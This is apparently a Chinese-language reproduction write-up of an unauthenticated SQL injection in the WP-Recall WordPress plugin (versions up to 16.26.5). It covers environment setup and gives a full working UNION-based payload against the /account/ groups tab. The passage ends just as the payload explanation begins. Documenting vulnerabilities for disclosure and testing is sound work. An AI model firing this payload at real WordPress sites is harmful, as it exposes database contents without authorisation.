漏洞描述

WordPress  是一款免费开源的内容管理系统，适用于各类网站，包括个人博客、电子商务系统、企业网站。其插件 WP-Recall 的 account 存在 SQL 注入漏洞，攻击者可以通过该漏洞获取数据库敏感信息。

WP-Recall 版本 <= 16.26.5

漏洞复现

搭建环境、安装插件、完成特定配置

环境：phpStudy_pro + WP-Reacll 插件 16.26.5 + wordpress 源码（这个版本无所谓，主要是插件版本要对上）

未授权的 SQL 注入攻击可以通过激活 Add-on Groups 功能触发，该功能在默认配置下是禁用的，一旦激活，攻击者就可以利用该漏洞进行未授权的操作

激活 Groups 后访问 /account/  这个目录然后如下图定位到漏洞所在位置

payload：/account/?user=1&tab=groups&group-name=p%27+or+%27%%27=%27%%27+union+all+select+1,2,3,4,5,6,7,8,9,10,11,concat(%22Database:%22,md5(123456),0x7c),13--+-

至此漏洞复现成功！

payload 解析：